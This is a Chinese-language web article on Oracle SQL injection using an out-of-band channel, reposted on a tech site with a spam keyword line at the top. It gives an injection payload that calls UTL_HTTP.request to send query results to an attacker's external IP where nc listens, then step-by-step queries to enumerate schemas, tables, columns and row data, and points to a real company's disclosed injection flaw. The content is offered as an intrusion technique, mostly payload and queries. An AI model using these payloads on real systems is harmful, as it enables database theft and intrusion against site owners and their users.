自拍偷在线精品自拍偷,亚洲欧美中文日韩v在线观看不卡

Oracle注射技術(shù)——Oracle+nc注射

作者:佚名
安全 數(shù)據(jù)安全
本文主要講述了Oracle注射技術(shù)的Oracle+nc注射。

首先外網(wǎng)nc監(jiān)聽對(duì)應(yīng)的端口

and UTL_HTTP.request('外網(wǎng)ip:port/'||(sql語句))=1--

爆庫:

select owner from all_tables where rownum=1
select owner from all_tables where owner<>'第一個(gè)庫名' 
and rownum=1
select owner from all_tables where owner<>'第一個(gè)庫名' 
and owner<>'第二個(gè)'and rownum=1
select owner from all_tables where owner<>'第一個(gè)庫名' 
and owner<>'第一個(gè)庫名' and rownum=1

以此論推

爆表

select TABLE_NAME from all_tables where owner='庫名'
and rownum=1
select TABLE_NAME from all_tables where owner='庫名'
and rownum=1 and TABLE_NAME<>'表名1'
select TABLE_NAME from all_tables where owner='庫名'and rownum=1 
and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'

以此論推

爆列:

select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1
select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1 and COLUMN_NAME<>'第一個(gè)爆出的列名'
select COLUMN_NAME from user_tab_columns where table_name='表名' 
and rownum=1 and COLUMN_NAME<>'第一個(gè)爆出的列名' and COLUMN_NAME<>'第二個(gè)爆出的列名'

爆內(nèi)容:

第一個(gè)內(nèi)容:select 列名 from 表名 where rownum=1

第二個(gè)內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個(gè)值'

第三個(gè)內(nèi)容:select 列名 from 表名 where rownum=1 and 列名<>'第一個(gè)值' and 列名<>'第二個(gè)值'

以此論推

現(xiàn)在大家轉(zhuǎn)過頭來看下“萬網(wǎng)的尷尬-萬網(wǎng)ORACLE注入漏洞曝光http://bbs.exploits.com.cn/read.php?tid-144.html

是不是很明了了...o(∩_∩)o...哈哈

注:

1:在windows環(huán)境下,oracle是以服務(wù)的形式啟動(dòng)的,這樣通過web注射就可以直接獲得system權(quán)限(此部分內(nèi)容正在整理測(cè)試階段中,以供給大家更直觀、簡潔、有效的參考資料

2:針對(duì)unix和linux操作系統(tǒng)方面對(duì)于Oracle也會(huì)作出分析,相信Oracle注射將會(huì)成為轉(zhuǎn)入高級(jí)Hack入侵的橋梁

3.這是個(gè)系列文章,后文有待更新

【編輯推薦】

  1. 將Oracle內(nèi)置的安全特性用于php
  2. Oracle Forms不安全處理臨時(shí)文件漏洞
責(zé)任編輯:許鳳麗 來源: 華盟收集
Oracle安全
相關(guān)推薦

2010-11-26 15:38:32

MySQL注入

2009-12-21 10:01:05

Oracle技術(shù)

2009-03-03 09:33:13

面試ORACLE

2010-09-08 13:23:00

2021-09-26 10:42:49

3D打印疫苗 技術(shù)

2009-06-03 10:32:36

Oracle性能優(yōu)化分區(qū)技術(shù)

2011-05-17 15:02:15

ORACLE數(shù)據(jù)庫備份

2010-12-29 10:33:51

Oracle

2011-05-18 09:39:19

Oracle數(shù)據(jù)庫性能優(yōu)化

2010-02-02 09:02:01

Oracle數(shù)據(jù)庫機(jī)Oracle Exad

2010-04-20 14:30:26

Oracle關(guān)系模型

2009-09-02 18:52:38

Oracle數(shù)據(jù)庫并行

2009-07-28 10:50:36

MetalinkOracle

2010-05-07 16:01:21

Oracle歸檔模式

2009-03-04 09:06:56

優(yōu)化sqlOracle

2011-03-31 09:55:59

Oracle數(shù)據(jù)庫開發(fā)技術(shù)

2017-03-28 11:39:58

深信服超融合平臺(tái)

2009-05-01 11:29:12

F5應(yīng)用交付 Oracle

2013-12-09 09:57:37

2011-05-19 13:25:14

Oracle數(shù)據(jù)庫
點(diǎn)贊
收藏

51CTO技術(shù)棧公眾號(hào)